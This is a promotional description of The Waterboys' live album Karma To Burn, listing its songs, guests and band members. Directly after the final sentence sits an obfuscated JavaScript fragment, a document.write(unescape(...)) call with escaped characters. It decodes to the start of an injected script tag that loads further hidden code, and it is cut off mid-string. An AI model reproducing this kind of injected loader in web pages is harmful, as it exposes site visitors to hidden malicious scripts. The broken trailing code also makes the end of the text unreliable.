Culled from recordings made during their 2003 and 2004 tours of Britain and Ireland, Karma To Burn highlights many sides of The Waterboys - paint-stripping rock and roll (Medicine Bow, My Dark Side), mythic narratives (Long Way To The Light, The Return Of Jimi Hendrix), masterful pop (The Whole Of The Moon, Glastonbury Song), the Celtic
dreamtime (Peace Of Iona, Fisherman's Blues), and acoustic soul (Bring 'Em All In, Open).
The album also features heart-stopping renditions of Rodney Crowell's ballad A Song For The Life (with guest appearance from Irish squeezebox virtuoso and former Waterboy Sharon Shannon) and the Felice & Boudleaux Bryant love classic, Come Live With Me, as well as an explosive, sultry 13-minute performance of The Waterboys' romance The Pan Within.
The tracks were selected by singer/guitarist/writer Mike Scott and mixed by Waterboys' soundman Chris Madden. The band features fiddler extraordinaire Steve Wickham, keyboard dynamo Richard Naiff and top R&B rhythm section Carlos Hercules and Steve Walters. The cover of Karma To Burn was designed by the exciting young Japanese artist Tosifumi Tanabu.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
